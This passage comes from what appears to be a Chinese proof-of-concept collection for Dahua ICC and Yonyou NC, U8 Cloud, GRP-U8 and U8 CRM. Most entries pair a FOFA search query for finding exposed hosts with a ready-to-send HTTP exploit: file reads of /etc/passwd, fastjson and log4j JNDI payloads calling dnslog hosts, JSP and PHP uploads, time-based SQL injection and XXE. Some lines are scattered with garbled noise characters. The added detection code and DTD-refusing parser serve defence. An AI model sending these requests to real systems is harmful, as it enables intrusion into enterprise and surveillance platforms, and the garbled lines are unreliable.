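A non-destructive way to confirm the error-based injections in entries 16, 17 and 19 from the response, as an added example that is not part of the original post: each POC makes the database compute a value the tester can predict (the MD5 of 1234 via HASHBYTES on SQL Server in entry 16, md5(102103122) inside updatexml in entry 17, user() inside EXTRACTVALUE in entry 19) and the response is checked for that value. The two response bodies are constructed to match the MySQL and SQL Server error formats; they were not captured from any target.

```python
# Added example (not part of the original post): confirm the error-based injections in
# entries 16, 17 and 19 from the response, using a value the tester can predict.
import hashlib
import re
import secrets


def md5_hex(seed: str) -> str:
    return hashlib.md5(seed.encode()).hexdigest()


def probe_seed() -> str:
    """A fresh nine-digit seed per probe (entry 17 used 102103122), so a cached or
    canned page cannot produce a false positive."""
    return str(100_000_000 + secrets.randbelow(900_000_000))


def mysql_marker_payload(seed: str, func: str = "updatexml") -> str:
    """Entry 17 style: the XPATH error message echoes ~md5(seed)~."""
    return f"{func}(1,concat(0x7e,md5({seed}),0x7e),1)"


def mssql_marker_payload(seed: str) -> str:
    """Entry 16 style: arithmetic on a hex string forces a conversion error that quotes the hash."""
    return f"1-CONVERT(VARCHAR(32), HASHBYTES('MD5', '{seed}'), 2);"


def mysql_confirms(response: str, seed: str) -> bool:
    """MySQL truncates the XPATH error text to 32 characters, so only the first 31
    hex digits survive after the '~'; compare as a prefix, not for equality."""
    m = re.search(r"XPATH syntax error: '~([0-9a-f]{8,32})", response)
    return bool(m) and md5_hex(seed).startswith(m.group(1))


def mssql_confirms(response: str, seed: str) -> bool:
    """CONVERT(..., 2) renders HASHBYTES as uppercase hex without the 0x prefix."""
    return md5_hex(seed).upper() in response


def confirm(response: str, seed: str) -> str:
    """Return 'mysql', 'mssql' or '' depending on which marker the response carries."""
    if mysql_confirms(response, seed):
        return "mysql"
    if mssql_confirms(response, seed):
        return "mssql"
    return ""


# Constructed responses (not captured from a real target).
MYSQL_ERROR_RESPONSE = (
    "HTTP/1.1 500 Internal Server Error\r\nContent-Type: text/html\r\n\r\n"
    "java.sql.SQLException: XPATH syntax error: '~81dc9bdb52d04dc20036dbd8313ed05'"
)
MSSQL_ERROR_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n"
    '{"code":500,"msg":"Conversion failed when converting the varchar value '
    "'81DC9BDB52D04DC20036DBD8313ED055' to data type int.\"}"
)


if __name__ == "__main__":
    seed = probe_seed()
    print(mysql_marker_payload(seed))
    print(mssql_marker_payload(seed))
    print(confirm(MYSQL_ERROR_RESPONSE, "1234"), confirm(MSSQL_ERROR_RESPONSE, "1234"))
```

Searching the response for a hash you computed yourself is the check; searching for the word "error" is not, because the Dahua endpoint in entry 17 may well return a SOAP fault for any malformed input.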
20. 大华ICC智能物联综合管理平台任意文件读取2 g7 `4 _6 G0 @
FOFA:body="*客户端会小于800*"
' }& v4 G% M0 d) xGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
7 {# |$ Z; e0 I3 O6 N: bHost: x.x.x.x/ l2 Z; o; v+ v, H) {# J0 z* N2 p
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 ~" Z5 \! H- |" m) l2 T. [
Connection: close1 y$ V* b7 w% w
Accept: */*9 I3 M4 X6 Y3 x$ l# z
Accept-Language: en, q' I6 x, G$ g2 x9 C
Accept-Encoding: gzip
( i8 E& K3 g. {4 V, W
; P9 a2 k3 b$ C% {) o; V! ^$ ]3 s% Z- a
21. 大华ICC智能物联综合管理平台random远程代码执行0 e5 Q# u* d. W" {0 h' Z  f& [, e3 Z% n
FOFA:icon_hash="-1935899595"
: Z( e! j* \9 s5 ?. J- h/ I. U" q( gPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
6 L$ }2 s' J; c4 |2 L' P' KHost: x.x.x.x, i2 K. k) a6 a" C/ e' I' T* l$ p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* ^, j1 o: O0 \
Content-Length: 161
( f# e* j4 c' qAccept-Encoding: gzip8 H. }1 j; _4 c/ S- a" D
Connection: close
9 T2 Z2 A+ ]( N) {4 kContent-Type: application/json;charset=utf-85 Q, S: P; g4 u' s

8 s* Z" D# d) N* @& U3 d. O+ `{
) Y' _( P/ j  V0 K7 ~  b7 N"a":{! [% Y2 U: H( Q; J. v
   "@type":"com.alibaba.fastjson.JSONObject",/ C; i- E3 @- l1 J2 C9 p
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
, B% B! L% N& ~* w  }"". F! h% }$ `8 Y* L
}
& v- |3 |  b1 d9 b9 A
% x' d6 S, p$ v: T% h* i% T
) q) q6 X% R9 B7 l' P4 n  b) Y7 m22. 大华ICC智能物联综合管理平台 log4j远程代码执行
& Z0 S) {6 V; e# w0 D1 v: A5 A& QFOFA:icon_hash="-1935899595"
6 @$ }6 C0 a; m: v  t& \POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
1 W7 }0 s( U  I; C- [( R0 I  XHost: your-ip
, T, R& `: W$ [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* ?2 f: i; U5 p# \. MContent-Type: application/json;charset=utf-8
# V3 I# @; {3 Q) U) N: l% g3 \  p0 v* t* A: A$ B
{
. e" X2 S; R* O7 y1 B2 _  u# @"loginName":"${jndi:ldap://dnslog}"
4 @; i/ v" ~9 u}& l- Z% }9 a! R- R0 i3 [+ k

, x/ i. J+ x4 L! ^% [, p2 P8 R; Q- {+ @* {( P$ O* X6 @# \

2 ^0 v0 u, d$ ~& Q9 v6 p4 Y6 Z23. 大华ICC智能物联综合管理平台 fastjson远程代码执行9 p( W4 y( K1 H+ B# M
FOFA:icon_hash="-1935899595"+ {1 \; P$ ?4 r
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.12 i9 j+ \8 g5 I* i/ c9 b9 V/ P
Host: your-ip1 ?5 [9 t5 c; ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 v9 e, k4 f" n1 [, h
Content-Type: application/json;charset=utf-8
2 U, G2 h* B; u5 X7 ]# q4 `' C& CAccept-Encoding: gzip9 f4 r0 y( b% v& r1 f2 N. Z
Connection: close$ P1 N+ ~5 O+ ^0 ^0 G- }, o) h

' J* [" p& {( R3 `! m8 L7 U{4 c+ O0 |3 `$ ?0 [( \1 T2 q
    "a":{
) B6 X- u( G$ C1 }        "@type":"com.alibaba.fastjson.JSONObject",
1 U0 s  x% M/ b       {"@type":"java.net.URL","val":"http://DNSLOG"}, a* B; W. x  K  R
        }""
8 q( o) X. r' @}: d5 b7 b# z5 D) p# a! G
7 M, w* m% }- V6 {/ C

24. 用友 NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

The destination path (including the .jsp extension) is taken from the client-supplied fname field, which is why a .txt upload ends up as an executable page under nc_web.

25. 用友 NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. 用友 NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. 用友 NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. 用友 NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Resulting path of the uploaded file (the extension comes from the client-controlled fileType parameter):
/uapim/static/pages/nc/head.jsp

29. 用友 NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. 用友 NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. 用友 NC runStateServlet SQL injection
Affected version: <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. 用友 NC complainbilldetail SQL injection
Affected versions: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. 用友 NC downTax/download SQL injection
Affected version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. 用友 NC warningDetailInfo API SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. 用友 NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

The traversal lives in the multipart filename: a relative path is accepted as the storage location, so the .jsp lands under nc_web.

36. 用友 NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. 用友 NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

Here the XXE is second-order: the SOAP envelope itself is clean, and the DOCTYPE is carried as a string inside CDATA that the service parses again as XML.

38. 用友 U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. 用友 U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. 用友 U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. 用友 GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Follow-up request:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

1 M) C9 S/ D; i; ?43. 用友GRP-U8 userInfoWeb SQL注入致RCE6 U9 u4 q, A2 g' t& X" V2 G1 ~
FOFA:app="用友-GRP-U8"
% }5 g( ^: E4 ePOST /services/userInfoWeb HTTP/1.1
$ v* c7 z4 g" Z# Y5 qHost: your-ip: \. Q: d9 X) U& |. R5 i- ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36# ?$ M/ u7 x' ?9 c8 i$ k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 [& _" z# F0 l. b9 ]
Accept-Encoding: gzip, deflate8 B, @9 K1 g" s
Accept-Language: zh-CN,zh;q=0.9
  X, s8 ], \/ D- h# Q1 E! N* QConnection: close
+ [( S& h/ n2 L; z1 ^SOAPAction:1 y  t8 W+ u% ?
Content-Type: text/xml;charset=UTF-82 l/ b4 o! [6 c2 c" X) _! q

8 o$ s6 O! u. k1 N<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
! m5 R8 y- V7 b- G   <soapenv:Header/>
! L. q5 S* i1 x$ s. C! P- i9 j   <soapenv:Body>7 t+ N/ q* F6 Z# j
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
0 ]7 d1 |( L9 G2 v. [         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>7 N! V0 C+ i+ X4 I, F* k7 P9 X- I
      </ser:getUserNameById>
- }: Y/ Z2 Z1 p   </soapenv:Body>6 m1 o2 ^7 ^# l( t% Q+ m  G% z3 y( a
</soapenv:Envelope>* z4 v1 S2 k. U) c
7 ~: P8 P  T' o

44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. 用友 GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

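Every XXE entry above (items 36, 37, 38, 40 and 45) depends on the parser accepting a DOCTYPE, whether it declares a file:// entity, an http:// entity for an out-of-band callback, or parameter entities (%aaa;). The added example below is not from the source post or the vendors named: it is a Python parser that refuses any DTD, run against bodies constructed from those POCs. The sample inputs are taken from the requests above; the element-list return format is an assumption of this example.

```python
import xml.parsers.expat as expat


class DtdNotAllowed(ValueError):
    """Raised as soon as the parser sees a DOCTYPE or an entity declaration."""


def parse_xml_no_dtd(data):
    """Parse XML with DTDs forbidden; return [(tag, attrs, text)] in end-tag order.

    Forbidding the DOCTYPE removes every entity declaration, so neither
    SYSTEM "file:///..." nor SYSTEM "http://..." nor parameter entities
    (%aaa;) can be declared, which is what each XXE POC above relies on.
    """
    parser = expat.ParserCreate()
    elements, stack = [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed(f"DOCTYPE {name!r} rejected (system id {sysid!r})")

    def on_entity_decl(*_):
        raise DtdNotAllowed("entity declaration rejected")

    def on_start(tag, attrs):
        stack.append([tag, dict(attrs), ""])

    def on_end(tag):
        elements.append(tuple(stack.pop()))

    def on_text(text):
        if stack:
            stack[-1][2] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)          # exceptions raised in handlers propagate out of Parse
    return elements


def accepts(data):
    """True if the document parses with DTDs forbidden, False if it was rejected for a DTD."""
    try:
        parse_xml_no_dtd(data)
        return True
    except DtdNotAllowed:
        return False


# Constructed from the request bodies above: the inner XML of item 37's CDATA,
# item 40's body, and item 45's reqData value (external DTD, no root element).
XXE_SAMPLES = [
    b'<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]><xxx/>',
    b'<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>',
    b'<?xml version="1.0"?>\n<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">',
]
```

Item 37 shows why the check must run on every parse, not only the outer envelope: the DOCTYPE arrives as a string inside CDATA and is only dangerous when that string is parsed a second time. For the Java stacks these products run on, the equivalent setting is `factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)` on the DocumentBuilderFactory or SAXParserFactory.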
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友 GRP A++Cloud government finance cloud, arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. 用友 U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

Note the DontCheckLogin=1 query parameter: the endpoint lets the client switch off its own authentication check.

49. 用友 U8 CRM uploadfile.php API arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The %s in the filename is a placeholder left by the source; the trailing space after .php is part of the payload (a blocklist on the literal ".php" extension misses "php ").

Resulting file, as given in the source:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
